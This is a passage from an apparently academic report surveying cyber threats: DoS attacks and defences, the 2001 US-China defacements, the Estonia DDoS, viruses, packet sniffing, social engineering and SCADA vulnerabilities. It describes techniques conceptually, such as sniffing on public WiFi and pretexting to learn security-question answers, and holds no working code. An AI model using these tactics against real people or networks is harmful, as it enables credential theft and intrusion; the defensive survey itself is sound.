an effort to ruin foreign information services.68

69

The attacks were mostly against web and email servers, but also included viruses and DDoS

attacks. Two non-critical web sites maintained by the US Navy were defaced by Chinese

hackers, replacing the original pages with protests relating to the crash. A commercial American

web site was replaced with pictures of the killed Chinese pilot, the Chinese flag, and the

statement “As we are Chinese, we love our motherland and its people deeply. We are so

indignant about the intrusion from the imperialism. The only thing we could say is that, when we

are needed, we are ready to devote

anything to our motherland, even

including our lives.”70

American hackers

committed similar defacements on many

Chinese servers as well, including

messages taunting the Chinese and

demands that China return the American

plane and i's passengers. The messages

that appeared on Chinese hacked sites

were diverse, some criticized the press

and the US government for taking the

incidents too seriously, while others

made dangerous threats. The following

example of a hacked Chinese web site

from the conflict demonstrates much of

the concerns raised by cyber-warfare:

67

Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool. 21 Oct 1999. University of

Washington. <http://staff.washington.edu/dittrich/misc/trinoo.analysis> 68

Delio, Michelle. Crackers Expand Private War. 18 Apr 2001. Wired Magazine. 30 Oct 2002.

<http://www.wired.com/politics/law/news/2001/04/43134?currentPage=2> 69

Delio, A Chinese Call to Hack the US. 11 Apr 2001. Wired Magazine. 30 Oct 2002.

<http://www.wired.com/politics/law/news/2001/04/42982?currentPage=2> 70

Feds Warn of May Day Attacks on US Web Sites. 26 Apr 2001. CNN. 30 Oct 2002.

<http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html>

Figure 2.2: Defaced Website

http://www.wired.com/politics/law/news/2001/04/43134?currentPage=2


35

With such messages appearing on hacked web sites, and attacks happening on other types of

servers as well, the National Infrastructure Protection Center issued a warning to American

networks to expect an increase in cyber-attacks from China. The incident happened during a

week which contained several dates of historical significance in China, including May Day,

Youth Day, and the anniversary of NATO bombing the Chinese Embassy in Yugoslavia. Youth

day in China commemorates protests against foreign aggression, resulting in magnified hostile

feelings as a result of the airplane collision and cyber-conflict. Despite the cyber-conflict,

relations between the United States and China remained civil, China accepted the United State's

regrets over the killed pilot, returned the crew operating the plane, and both governments

prevented the conflict from escalating beyond cyber-space.71

2.2.7 Defense against DoS Attacks:

The threat of DoS attacks paralyzing computer systems coupled with diplomatic crises like the

incident with the Chinese jet collision has led to further consideration over what can be done to

prevent cyber-damage. Denial of Service attacks present new technical challenges for experts

attempting to protect their systems and identify offenders. Currently, a combination of

technology and human vigilance is employed to defend against DoS. DoS is an actively

researched area, with a wide variety of proposed solutions available. The costs of implementing

these solutions changes dramatically with the scale of the system being defended. There are also

published suggestions that apply to Internet Service Providers and the networks that form the

core information paths on the Internet.

2.2.8 Defending Individual Systems:

The first weak point that can be improved are the common personal computers ran by most of

the population. Personal computers are usually the vulnerable systems which attackers are able to

commandeer en mass and use to commit their decentralized attacks. Much to the frustration of

larger systems which depend heavily on the Internet and spend major resources protecting

themselves, large sets of commonly weak computers can still overwhelm protected systems.

Reducing the amount of vulnerable systems that attackers can seize control of possible through

several relatively simple tools and practices. Users need to keep their systems up to date. Many

software packages automate the update process so that fixes to security happen regularly, while

others require that the user regularly check the Internet for updates and download them.

Updating software can be difficult for many computer users, but improvements to the update

process can reduce the weak systems available to attackers. Another practice which can reduce

vulnerability is for users to disable software which they do not use. By running the bare

minimum of programs which attackers can communicate with and exploit, attackers will have

fewer ways to take control of remote systems and use them to cause harm. Disabling unneeded

software on a computer can also be difficult, but can be made easier if distributors of computers

package them with default settings that run few exploitable programs and automate the update

process.

71


<http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html>

36

Software placed on personal systems can also improve protections against DoS attacks. The most

common tools of system protection are currently virus scanners and firewalls, both of which help

to reduce the amount of systems which can be infiltrated. A firewall protects systems by limiting

which of its processes can communicate with the network. A system that has fewer processes

that remote users can communicate with has fewer ways by which attackers may take control of

it. Virus scanners can also be used as a way to reduce DoS attacks because many viruses are

designed to seize control of computers and commit DoS attacks automatically. Attackers often

use mixed methods of cyber-attack, which take advantage of vulnerabilities in one area that

cascade into vulnerabilities of another. Defenses against DoS attacks thus require defenses

against other styles of computer-attack viruses.

2.2.9 Defending Local Networks:

At the local networks, defense can be improved by using Intrusion Detection Systems and

logging tools. Intrusion Detection Systems monitor networks for suspicious traffic and warn

administrators of possible attacks. Detection can be adjusted for specific levels of caution, but

the warnings provided by such systems require experiences administrators who know how to

respond to them appropriately. Sometimes Intrusion Detection warnings are false alarms, but the

systems are still helpful in protecting networks. 72

A variety of tools exist which log the activity

of systems, allowing administrators to notice when their systems have changes unexpectedly, and

aid in tracing the source of attacks. Logging can also act as a deterrent to attackers who worry

about being caught. Hackers put a lot of effort into escaping detection by tampering with activity

logs, but logging tools have responded to this tampering by developing more resistant logging

systems. Local networks could also be made more secure by enforcing stricter rules on

passwords, requiring that they be used and are not easily guessed.

2.2.10 Defending Extended Networks:

On the wide area network level, many solutions to attacks have been proposed, and some

solutions are already in place. Filtering at the core of the Internet, known as Ingress and Egress

filters, helps to prevent attack messages from being broadcasted. Ingress and Egress filters work

by comparing the source and destinations of data packets with maps of the network, and refuse to

forward data that could not possibly travel through the route that it is found on, which reduces

the amount of data traversing the Internet with forged source information. Changes to the core of

the Internet are seen as the last resort, because of the far reaching affects that the changes may

have. Cooperation among the interconnected networks allows for attacks to be limited more

efficiently. During a DoS attack, attacked systems work to block the data floods at their sources

by tracing the messages down the pathways and requesting that certain messages be blocked

along each intersection of the network. DoS attacks can be limited if their messages are blocked

72

Ptaceck, Thomas & Newsham, Timothy. Insertion, Evasion, and Denial of Service: Eluding Network Intrusion

Detection. Jan 1998. Secure Networks Inc. 30 Oct 2007. <http://insecure.org/stf/secnet_ids/secnet_ids.html>

37

closer to their sources, but this requires rapid response across long distances and collaboration

between business competitors.73

2.2.11 Case Study: Estonia DDos Attacked by Russia

In April of 2007, Estonia relocated a monument of a Bronze World War II Russian soldier from

the central square of its capital city, Tallinn. The relocation of this statue enraged Russians and

started riots in Tallinn, and also incited DDoS attacks against Estonian government and banking

services. Estonia has developed a strong dependence on the Internet, and has declared Internet

access as a fundamental human right. Estonia has developed what they call the “paperless

government” which operates largely over computer networks and allows citizens to vote online.

The Internet infrastructure has led to Estonians referring to their country as “E-stonia” and has

become a source of pride for the country.74

In response to the relocation of the Russian monument, attacks started against the Estonian

foreign minister's web site, then spread to include all government institutions and key businesses.

Russia was accused of launching the attack, and the Estonian Minister of Justice claimed the

attacks had been traced to computers in Moscow belonging to the Russian government.

Independent experts did not find convincing evidence that Russia orchestrated the DDoS attacks.

Estonia called for technical assistance from NATO as their banks and government services were

flooded. The attack lasted about a week, during which economic activity in the country was

slowed down, and the government was without Internet communication. Eventually, Estonia had

to cut off its Internet connections with other countries so that its population could access the

needed government services. This had the side effect of making bank transactions between other

countries difficult. In defending against the attack, Marty Lindner, a senior member of the

technical staff at the Computer Emergency Response Team (CERT) said that “In the case of

Estonia, they were only targeting 12 or 13 distinct Web sites, but the collateral damage was the

national bandwidth resources,” Lindner says. “In the big scheme of things, short of getting

people outside the country to filter the attack traffic, there wasn’t much somebody in Estonia

could do but hold on for the ride.” In response to the incident, the European Union began

discussing possible agreements that could help mitigate damage caused by DoS attacks.75

2.3 Computer Viruses

Computer viruses are a subset of malware, which is broadly defined as any unwanted and

problematic software running on a computer system. What separates a virus from other

undesirable software is that viruses are made to self-replicate and spread to other computers.

Most viruses are malicious programs written by computer hackers, though recently certain

software distributed by businesses has been classified as a virus by some sources. Computer

73

Chang, Rocky. Defending Against Flooding Based Distributed Denial of Servie Attacks: A Tutorial. IEEE

Communications Magazine. Oct 2002. 42 - 51 74

Lesk, Michael. The New Front Line: Estonia Under Cyber Assault. IEEE Security & Privacy. Jul/Aug 2007. 76 -

79 75

Goth, Greg. The New Politics of DDoS Attacks. IEEE Distributed Systems Online. Aug 2007. 1 - 4

38

viruses are a thoroughly researched sector of cyber security, led mostly by companies selling

software designed to combat viruses.

The practice of creating and distributing viruses has existed since the mid 1980s, though sources

differ on when exactly it started due to differing opinions on what exactly constitutes a virus.

Over time, virus production has grown increasingly sophisticated, and programs have been

designed to cause a variety of negative effects. Viruses can be harmless pranks, causing nothing

more than an annoying message, but are also capable of causing massive data loss, disrupting

communication, and allowing attackers to control a computer remotely.76

2.3.1 Types of Viruses

As new viruses are developed, security experts have classified them into categories by their

behavior. The following terms describe subsets of computer viruses.

Traditional Virus: These programs alter existing software on a computer so that when executed,

the virus will attempt to insert itself into more pieces of software, resembling biological viruses

spreading an infection.

Worm: Software that relies on system vulnerabilities to replicate and spread is referred to as a

worm. Worms are distinguished from other viruses in that they do not exist as parts of existing

software, but rather as self contained programs that propagate through security exploits.

Trojan Horse: Programs that trick the user into executing them by masquerading as a file that the

user wants are referred to as Trojans. Trojans are unique in that they spread and infect computers

by using social manipulation.

Rootkit: Software which is designed to run at the highest level of access on a system, and use

administrative permissions to hide its existence is known as a rootkit. Rootkits often have the

ability to escape detection and take full control of the system. 77

2.3.2 Effects of Viruses

Each type of virus is characterized by the way it spreads to other systems. The actual effect the

virus has on a system once is it is infected is called the “payload”. The payloads of viruses vary

greatly, allowing them to be used as pranks or dangerous weapons. Common virus payloads

include offensive messages, forcing the system to send spam messages to others, allowing a

hacker to control the system remotely, erasing potentially critical data, intercepting sensitive

information, and even forcing the system to commit a DoS attack.

76

Harold Joseph Highland. A history of computer viruses -- Introduction, Computers & Security. Vol 16, Issue 5.

1997, p 412-415.

<http://www.sciencedirect.com/science/article/B6V8G-3SX269W-2P/2/e96ee1d35ae6e62abd338c29a32234a7> 77

Perdue University. Virus Terminology. 2005. 1 Dec. 2005

<http://www.purdue.edu/securepurdue/steam/help/view.cfm?KBTopicID=210>.

39

2.3.3 Defense against Viruses

Detection and removal of viruses is a heavily researched discipline. A large industry has grown

for the development of tools to eliminate viruses before they can cause damage. Professionals

work constantly to track viruses as they spread and automate the process of removing them for

their customers. A virus scanner is a popular type of software which attempts to scan computers

for viruses and assist in their removal. Hackers and security professionals are in a race to

improve their tools. Hackers have a strategic advantage against security professionals in that they

can create new viruses and use them to cause damage before the virus is discovered and the

scanner is updated to detect and remove it.

Virus scanning software is handicapped in the effort to eliminate viruses because it must be

updated constantly to be equipped to handle the new threats that are constantly emerging. There

is an inevitable lag involved in the process of developing scanning capabilities for every new

virus that gets created, and hackers are using increasingly clever methods to circumvent virus

scans. Many virus scanners have the capability to detect new viruses by closely observing the

functions that the system is performing. Scanners have limited prediction capabilities that are

sometimes capable of detecting and removing newly developed viruses; so that when new

viruses share the same patterns of behavior as familiar viruses they can be found and

eliminated.78

Figure 2.3: Virus Scanner Interface

79

The development of new tools to detect and eliminate viruses is active and thriving, along with

warning systems that enable computer users to anticipate viruses as they spread. With warnings

in place, often describing how the virus arrives and how to notice if a system has been infected,

users are better equipped to prevent infection and reduce damage. The main problems in defense

78

Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51. 79

US-CERT. Home Computer Security - Examples. 2002. 1 Nov. 2005

<http://www.cert.org/homeusers/HomeComputerSecurity/examples.html>.

40

against computer viruses at the moment are systems which use no virus scanning, scanners that

are not updated for new viruses, and users who are easily tricked into infecting their computers

2.4 Packet Sniffing

Packet Sniffing is a network analysis technique used to monitor traffic between devices on a

network. It is used extensively by network administrators, and has a number of legitimate uses.

In the hands of a subversive computer user, however, packet sniffing becomes a useful tool for

obtaining sensitive data without penetrating a computer network’s security measures. In order to

understand how packet sniffing works, its uses both harmful and helpful, as well as its

limitations and caveats, a few key concepts must be defined.

2.4.1 Data Streams and Packets

The Ethernet connections that exist between computers are far from perfect, and, in order to

compensate for lost data, many data transfer protocols break the data into small, contained

packets of information. On the other end, the computer receiving the data easily pieces it back

together, and immediately recognizes which packets were dropped.

The packets themselves are small and self contained, with “header” information, which details

where it goes in relation to other packets, its size, and so on, as well as diagnostic information

used to ensure the packet was received in its entirety.

Data streams are the lines of packets that stretch between the source and destination. When

packet systems are used on a “connectionless” system, such as the Internet, the packets may take

multiple paths to their destination in order to optimize the connection for speed and minimize

packet loss.

2.4.2 File Transfer Protocols

Different actions on the Internet use different file transfer protocols to guide how the computers

in a network package information for transfer. For example, web surfing uses the HyperText

Transfer Protocol (HTTP) to deliver the source code. Web based email services such as Hotmail

and GMail, however, may use the IMAP4 or POP3 systems.

This information is relevant to this topic because different file transfer protocols devote different

levels of attention to security. IMAP4 and POP3, the previously mentioned email protocols, for

example, make no attempt to encrypt the body of the email, meaning that merely intercepting a

packet is enough for a sniffer to obtain and read a piece of that email.

2.4.3 Networking Schemes

2.4.3.1 Ethernet Networks

Most wired (as opposed to wireless) computer networks use an Ethernet configuration, either

configured in a Local Area Network with cables physically connecting each device, or connected

41

to an outside connection, such as ADSL or Cable, to the Internet. Networks may also use a

hybrid of these. Local Area Networks theoretically restrict connections to computers that are

physically connected into the network. When one or more of those computers also has a

connection to the Internet, however, a skilled user may communicate to any or all computers on

that network, provided no firewall exists, or it has been compromised.

Packet visibility in Local Area Networks is based largely on the physical layout of the Ethernet

network. When computers are connected together using devices called “hubs”, each member of

the network may monitor all of the traffic going through the hub. Hubs take the information sent

from each member of the network and send it to every other member. Switches, however, are

designed to isolate network members from each other unless they are communicating directly,

though many packet-sniffing programs are designed to overcome this function.

2.4.3.2 WiFi Networks

WiFi networks allow computers to communicate wirelessly, using radio signals. WiFi

connections are based off the 802.11 standard developed by IEEE, which is commonly seen in -b

and –g varieties. Computer users can use WiFi connections to connect to the Internet through

hubs while in “hotspots”, or connect directly to other computers with WiFi cards to establish

“peer-to-peer” communications. Today, many businesses offer free WiFi on their premises

offering unfettered access to the Internet, with traffic controlled only by User Agreements posted

in the buildings with various degrees of visibility.

WiFi network administrators have some options for securing their networks, including

“whitelisting” and WEP. Whitelisting requires the administrator to manually input the Media

Access Control (MAC) addresses of each computer he or she wants to have access. This method

is vulnerable to “spoofing” (see below).

Wireless Encryption Protocol (WEP) is a feature of 802.11 networks used to prevent computers

that have not been given the WEP key to connect to the network. Unfortunately, open-source

programs are available that can crack WEP keys. AirSnort80

is an example. Its webpage claims

that it can crack a WEP key in under a second once the program has been allowed to monitor 5-

10 million packets

Once a computer is allowed onto a WiFi network, all packet transfers are visible to it, although

most WiFi cards review and ignore packets destined for other nodes on the network. Many cards

feature a “promiscuous mode” which causes it to pay attention to all packets. This may then be

coupled with a packet-sniffing program.

2.4.3.3 Network Interface Cards and Promiscuous Mode

A Network Interface Card (NIC) is an internal computer component that connects to networks,

either Ethernet or 802.11. With the exception of Ethernet networks with uncompromised

switches, both network types allow NICs to see all packet traffic on the network. By default,

NICs ignore all but the data streams with its host computer as the destination. This design is as

80

Airsnort Homepage. 31 Dec 2004. The Schmoo Group. 30 Oct 2007. <http://airsnort.shmoo.com/>.

http://airsnort.shmoo.com/

42

much for efficiency as much as security. Nearly all NICs, however, have the capability of

running in “promiscuous mode”.81

With this turned on, the NIC reads all of the packets that

travel over the network.

2.4.4 Implementations

Once a computer is on a network, the most difficult task is complete. Packet sniffing programs

are easy to find, and many are free and open source. They work by putting the NICs in

promiscuous mode, then analyzing the received packets. Many packet sniffers contain

algorithms that will automatically look for user names and passwords, streamlining the process.

2.4.4.1 Spoofing

The term spoofing refers to a computer misrepresenting its network identity in order to receive

data intended for another computer on the network. Examples of spoofing include MAC

addresses and IP addresses. While this information is difficult for an unskilled user to obtain, a

number of tools are available to hackers who seek it.

2.4.4.2 Limitations and Counters

When one computer spoofs another that is still operational, it can create inconsistencies in the

return traffic that can clue in network administrators and well-designed programs. Hackers may

try to counter this by coupling spoofing with Denial of Service attacks on the spoofed computer,

in order to create the appearance of one computer using that network identity.

Though the threat of packet sniffing may seem dire, a number of limitations impede the goals of

hackers and spies. Some of these limitations are inherent to the packet sniffing method, while

others are safety measures that system administrators may take to protect their networks.

Non-packet transfers

Not all data transfers use the packet transfer scheme. Communications such as Voice Over IP

(VoIP) require a static connection between the source and the destination to ensure a high rate of

transfer. Because these streams are constant, and follow a fixed path through the network, the

chances of the hacker’s computer being used in the transfer path is lower, and the data is much

harder to decode. In addition, the streamed audio data has no plain text component, and the

hacker would have to be able to reconstruct the stream (no easy feat) in order to take any

information out.

Secure protocols

HTTP, IMAP, and all the other previously mentioned transfer protocols are old, despite their

ubiquity. New protocols, such as Secure Socket Layer, are meant to provide secure methods for

transferring data. Like radio operators in World War II, however, cryptologists must fight to stay

one step ahead of hackers trying to defeat their algorithms.

81

Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Iron Geek.com. 30 Oct 2007.



43

Secure programming

A concept being introduced into software engineering curricula with growing frequency, secure

programming involves incorporating security into the very code of the applications that need to

transfer data across networks.

Some of the advantages of secure programming include increased security over normally

unsecured transfer protocols like FTP and POP3, or an extra layer of encryption on top of WEP,

SSL, etc. Packet sniffers, specifically, use computer algorithms to try to construct readable text

from unordered machine code82

, and the extra layer of encryption would likely render most of

these algorithms useless.

Packet Sniffer detection programs

Packet sniffing programs generate little or no return traffic, instead monitoring the data

passively. As such, they are fairly difficult to detect. Programs like Sniffdet83

, however, can be

used to detect NICs that are running in promiscuous mode. Sniffdet is open source, and free for

anyone to use, though a certain level of computer skill is required to run the program correctly.

Awareness Perhaps the best way to prevent packet sniffing is to educate the network administrators who set

up and run the networks over which sensitive information travels. Adrian Crenshaw mentions

simple practices like putting public terminals on separate networks from staff and administrator

networks, and setting workstations to lock when not in use.

Packet sniffing works because it is easy for hackers to do. Intelligent network setups and users

can make this process much more difficult for hackers with relatively little effort.

2.4.5 Scenarios

2.4.5.1 Public WiFi Service

Many restaurants and cafés offer free WiFi service around their establishments, and users are not

even strictly required to be customers. With the exception of vague user agreements, no attempts

are made to limit access. An identity thief or hacker might set his or her laptop up within range

of the establishment, though not necessarily inside or on the grounds. Meanwhile, a customer

checks his or her email using a POP3 system. One of the messages is a confirmation email from

an online business website, containing the customer’s user name, password, and credit card

information.

82

Mendis, Surakshan. Packet Sniffing. 2005. SuraSoft. 30 Oct 2007.

<http://www.surasoft.com/articles/packetsniffing.php>. 83

De Souza Reis, Ademar, and Filho, Milton Soares. Sniffdet – Remote Sniffer Detector for Linux. 10 Oct 2006.

SourceForge.net. 30 Oct 2007. <http://sniffdet.sourceforge.net/>.

http://www.surasoft.com/articles/packetsniffing.php

http://sniffdet.sourceforge.net/

44

2.4.5.2 University Networks

North Carolina State University provides two wireless networks across its campuses, one for

guests, and one for students and staff. However, a resourceful hacker could easily obtain the

username and password from one of the thirty thousand users in the latter category. Running a

packet-sniffing program, he or she would then have access to a significant amount of

information. This could range from credit card information as before, to staff research

performed on government grants.

2.5 Social Engineering

“The weakest link in an information-security chain is often the user because people can be

manipulated.”84

Social engineering combines hacking with classic confidence schemes and other

low-tech methods to obtain user information that may be used in information theft or system

attacks.

Social engineering attacks may be as simple as the 419 (Nigerian) Scams that send probing

emails to thousands of addresses, or complex plans, involving surveillance and target “casing” in

order to best obtain the target’s trust.

2.5.1 Confidence Schemes or Trust and Attack Models

Confidence schemes bring con men to the world of cyber-attacks. Trust and attack models

include constantly evolving scams tailored to each particular target. As the social engineering

hacker learns more about the target or the target’s company, he or she incorporates this

information into exchanges, either phone, email, or conversational, in order to appear more

legitimate. The hacker may pose as a coworker in a large firm, or even a new acquaintance, and

the information gleaned is not always, even rarely, technical in nature. Hobbies, and the names

and birthdays of family members and pets, are commonly used to produce easy-to-remember

passwords.

An extremely simple example of a trust and attack model could take place in a dog park. The

hacker takes a dog to the park and strikes up a conversation with the target, learning the name of

the target’s dog. This information is a popular security question on many major websites,

including Hotmail. Email passwords are particularly useful targets, as even more websites use

password recovery systems that send the old or changed password to the user’s email.

2.5.2 Phishing

Phishing is a term that refers to emails and websites that attempt to gather user information,

typically through fraud and spoofing (see Error! Reference source not found.). At their

simplest, phishing attacks can simply be used to determine whether email addresses are in active

84

Laribee, Lena, et. al. Analysis and Defensive Tools for Social-Engineering Attacks on Computer Systems.

Information Assurance Workshop, 2006 IEEE. 388 – 389, 21-23 June 2006.

45

use, and/or the user is a likely candidate for social engineering. 419 scams begin in this way,

then follow trust and attack models as hackers establish a relationship with the targets and

convince them to commit fund transfers.

More elaborate phishing attacks are more specifically targeted. In October of 2006, a number of

employees at Dekalb Medical Center in Decatur, Georgia accidentally downloaded a key-logging

program when they responded to an email spoofed from Dekalb’s domain, dekalb.org, which

claimed that they had been laid off.85

2.5.3 Dumpster Diving

“I have found private numbers for very important people on post-its. Building

security alarm codes. And my personal favorite, payroll account login and

passwords. It amazes me the things people write on these little brightly colored

pieces of paper. They serve their purpose for a short time and are then balled up

and thrown into the trash. How many people think to shred their Post-Its.”86

Provided no other laws are broken in the process, no federal law prohibits dumpster diving. At

the state level, only theft and trespassing laws cover the activity. Most theft laws state that it is

illegal to take “items of value”, and a number of questions have arisen regarding the value of

objects thrown in the trash. Journalists, law enforcement officers, private investigators, and

social engineers all use dumpster diving as an information collection technique.

Only four states require companies to destroy personal information upon disposal.87

Besides

user names and passwords, company trash may yield maps of corporate structures, phone lists,

and interoffice communiqués, all useful for giving social engineering hackers more background

information and, therefore, more legitimacy when phishing or running trust and attack schemes.

2.5.4 Case Studies

Hacker-turned-contractor and writer Kevin Mitnick described a case of a Pakistani militant

named Khalid Ibrahim, who offered money to American hackers to hack into government and

military websites. In a test hack, Ibrahim offered $1,000 to a hacker who used the Internet

handle of “ne0h” to obtain a number of usernames and passwords for a well-known Chinese

engineering university.

ne0h began by finding a kindred hacker among the students of the university, who offered him a

number of user accounts with passwords without question. ne0h noticed that many of the users

85

Garretson, Cara. Spam that delivers a pink slip. ComputerWorld.com. 1 Nov 2006. 26 Nov 2007.

<http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=se

curity> 86


<http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&or

der=0&thold=0> 87

Dumpster Diving. Washington State Office of the Attorney General. 26 Nov 2007.

<http://www.atg.wa.gov/ConsumerIssues/ID-Privacy/DumpsterDiving.aspx>

46

had simply set the password to the user name. From there, the teenaged hacker found another

college student through chat rooms and claimed to be looking for friends around the campus.

The student responded with a list of email addresses, and ne0h quickly figured out the

corresponding user names and passwords.88

2.6 SCADA Systems

Supervisory Control and Data Acquisition (SCADA) systems collect data from control sensors

that measure physical parameters like flowrate, temperature, or pressure in a factory,

infrastructure plant, or in other remote locations, and then send this data to be processed by a

central computer. A computer alone is not a SCADA system—most SCADA systems consist of

input and output signal hardware, controllers, networks, communications equipment, and a

Human-Machine Interface (HMI). HMIs, like the one shown in Figure 1, are often controlled via

common operating systems like Windows and Linux, which are vulnerable to many types of

viruses and other cyber-attacks—these problems can be made worse if the operating system is

not patched frequently89

.

Figure 2.4: A Human-Machine Interface for a steam power plant operating in Windows

90

Remote programmable logic converters called Remote Terminal Units (RTU) interface directly

with the controlled processes to carry out the operations performed by a SCADA system. These

logic converters are usually programmed to meet specific process requirements and can often

automatically make slight changes to monitored parameters to optimize functionality; for

88

Mitnick, Kevin, & Simon, William L. (2005). The Art of Intrusion: When Terrorists Come Calling.

Indianapolis, IN: John Wiley and Sons, Inc. 89




SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007

<http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

47

example, the RTU might control the speed of a conveyor belt or the temperature of a holding

tank at a chemical plant. RTU units are currently built with redundancies in hardware and

communications channels in case of damage to the physical system, and can often operate on

their own to control safety-related problems91

. However, despite these automatic failsafes, input

from a human can change or override these settings at any time92

.

2.6.1 Scope of the Threat to SCADA Systems

Currently, SCADA systems are involved in the manufacture of many consumer products,

including pharmaceuticals, and in controlling critical infrastructures like electric power

generators, water treatment plants, dams, nuclear power plants, and other systems93

. According

to Joe Weiss of Applied Control Solutions, the industry perceptions of a SCADA attack’s

capabilities are greatly underestimated: “What people had assumed in the past is the worst thing

you can do is shut things down. And that's not necessarily the case. A lot of times the worst thing

you can do, for example, is open a valve -- have bad things spew out of a valve94

.” Manipulating

SCADA controls could allow a cyberattacker to accomplish anything from increasing the amount

of waste in a local water supply to altering the oscillation in an electric power generator in such a

way that it physically explodes. Consequently, the effects of a large-scale cyberattack utilizing

remote access to SCADA systems could potentially be disastrous.

Despite the importance of SCADA systems to critical infrastructures, these systems are rarely as

safe or as isolated as the industry thinks. Of 13 cyber-security incidents involving SCADA

systems between 1980 and 2000, only 31% of attacks originated from outside the company, the

rest were either the result of accidents or disgruntled employees who had direct access to the

systems95

. However, between 2001 and 2003, the source of cyber-attacks on these shifted to

70% originating from outside the company (Figure 2).

91


<http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>. 92

"What is SCADA?" The Tech-FAQ. 2007. 27 Oct. 2007 <http://www.tech-faq.com/scada.shtml>. 93

"Multi-State Information Sharing and Analysis Center (MS-ISAC)." 2006. Multi-State Information Sharing and

Analysis Center (MS-ISAC). 21 Oct. 2007 <http://www.msisac.org/scada/>. 94

Meserve, Jeanne. "Sources: Staged Cyber Attack Reveals Vulnerability in Power Grid." CNN 26 Sept. 2007. 27

Sept. 2007 <http://www.cnn.com/2007/US/09/26/power.at.risk/index.html>. 95



<http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

48

Figure 2.5: Origin of SCADA-related cyber-attacks

96

While the threat of a SCADA attack due to an inside source is decreasing markedly, the rate of

external attacks is increasing even faster, and this must be considered when making policy

decisions.

2.6.2 Vulnerabilities

2.6.2.1 Original Development Flaws

Many SCADA systems are vulnerable to cyber-attacks, and this stems back to the way in which

they were originally developed. The first SCADA systems were developed over twenty years

ago, before the majority of other corporate networks were put into place, and many of these

original SCADA systems are still in use today. This leads many information technology

managers to believe that these networks are not linked, so that SCADA systems cannot be

accessed through corporate networks or remote access points. In reality, many corporate IT

networks and SCADA systems are linked so that engineers can control systems from remote

points on the corporate network and managers can find critical data instantly. IT managers

usually make these connections without a full understanding of the security risks, and the

security policies of most corporations do not account for the possibility that SCADA systems

could be accessible through other corporate networks97

.

96





<http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.

1980-2000 2001-2003

49

2.6.2.2 Corporate Network Security

Research into the security of corporate networks produces startling results—independent security

researcher Shawn Merdinger discovered in 2006 that at least a handful of critical infrastructure

companies who planned to attend the DEFCON hacking meeting in Las Vegas were connecting

to the Internet using residential routers with documented vulnerabilities. Merdinger described

these systems as being “almost as secure as my mom's computer.98

” This is particularly

alarming because, as long as these corporate networks are unprotected, the SCADA systems

linked to them are equally as vulnerable. Other basic problems in companies’ network

architecture include improper configuration of FTP or email servers to allow internal network

access inadvertently, unsecured connections with corporate partners, and failure to implement

firewalls and other network security measures internally, which leaves little to no separation

between different sectors of the network99

.

This unawareness of network security flaws creates an even bigger problem, because SCADA

systems were not originally designed with cyber-security in mind. Alan Paller, director of

research for the SANS Institute, said of these design flaws, “It's not that these guys don't know

what they are doing. Part of it is that these systems were engineered 20 years ago, and part of it

is that the engineers designed these things assuming they would be isolated. But--wham!--they

are not isolated anymore.100

” One problem with this is that old SCADA systems do not utilize

security updates like new corporate networks do, and cannot be protected independently by such

measures. Because they were intended to be isolated, there are many basic security

shortcomings built into SCADA systems as well, such as the absence of per-user

authentication—users log in with easily guessed names like “admin” rather than a personal user

ID101

. This flaw not only makes it easier to infiltrate SCADA systems, but also makes the

infiltrator much harder to track, since all users utilize the same login information.

2.6.2.3 Company Security Procedures

The weaknesses of SCADA systems often go beyond engineering design flaws into company

security procedures as well. Many companies list data on their websites that can be useful for

hackers, such as email addresses, employee names, and sometimes even corporate network

system names. These problems could mostly be eliminated simply by removing information that

could be useful to hackers from company websites.

98

Lemos, Robert. "SCADA System Makers Pushed Toward Security." SecurityFocus 26 July 2006. 19 Oct. 2007

<http://www.securityfocus.com/news/11402/2>. 99


<http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>. 100


<http://www.securityfocus.com/news/11402/2>. 101



50

2.6.2.4 Who Could Gain Access?

Without increased security measures, anyone with a basic knowledge of hacking could

theoretically gain access to a SCADA system. Of the security incidents recorded between 2000

and 2003, the Internet was the single largest source, but security was also breached through other

sources, like wireless systems, dial-up connections, and third party connections (Figure 3).

Therefore, simply implementing measures to close off one access point, like an Internet firewall,

is insufficient—as many entry points as possible should be protected102

.

Figure 2.6: Entry points of SCADA-related cyber-attacks

103

Because many companies lack knowledge about their own cyber-security vulnerabilities,

infiltrating a SCADA system would not require a target assault from a country or terrorist

organization: just one “average” hacker would be skilled enough to gain access. For example, in

one penetration test by Black Hat Security, a single representative was able to find an

unprotected WiFi access point and infiltrate the SCADA system using a ten-year-old exploit of

Solaris, the Unix-based operating system on which the SCADA system was running104

. Since

the United States military invasion of Afghanistan in 2001, they have seized computers and

102









51

instruction manuals containing SCADA information relating to dams in Al Qaeda training

camps, although they found no evidence of an actual plan to attack105

.

2.6.3 Case Studies

2.6.3.1 Hunter Watertech

On April 23, 2000, a disgruntled ex-employee named Vitek Boden infiltrated the Hunter

Watertech wastewater system in Queensland, Australia, using only a stolen computer and radio

transmitter. From an external site, he entered the system by using software to identify himself as

“pumping station 4” and deactivated all alarms that would alert IT security to his presence in the

system. Though he was familiar with the system, all the equipment he used was commercially

available, and he faced no obstacles when accessing the Hunter Watertech network106

.

After entering the system, Boden remotely controlled 300 SCADA nodes governing both sewage

and drinking water, and flooded millions of gallons of sewage into parks, rivers, and hotel

grounds. His actions destroyed the ecosystem of the affected rivers and caused a stench that was

“unbearable” to residents107

. While there were no reported human deaths, Boden’s case is

currently the only known case in which a SCADA system has been used to cause harm.

2.6.3.2 Roosevelt Dam

However, SCADA systems have been accessed unintentionally in the past, and could have had

disastrous results if mismanaged. In 1998, a 12-year-old hacker unknowingly infiltrated the

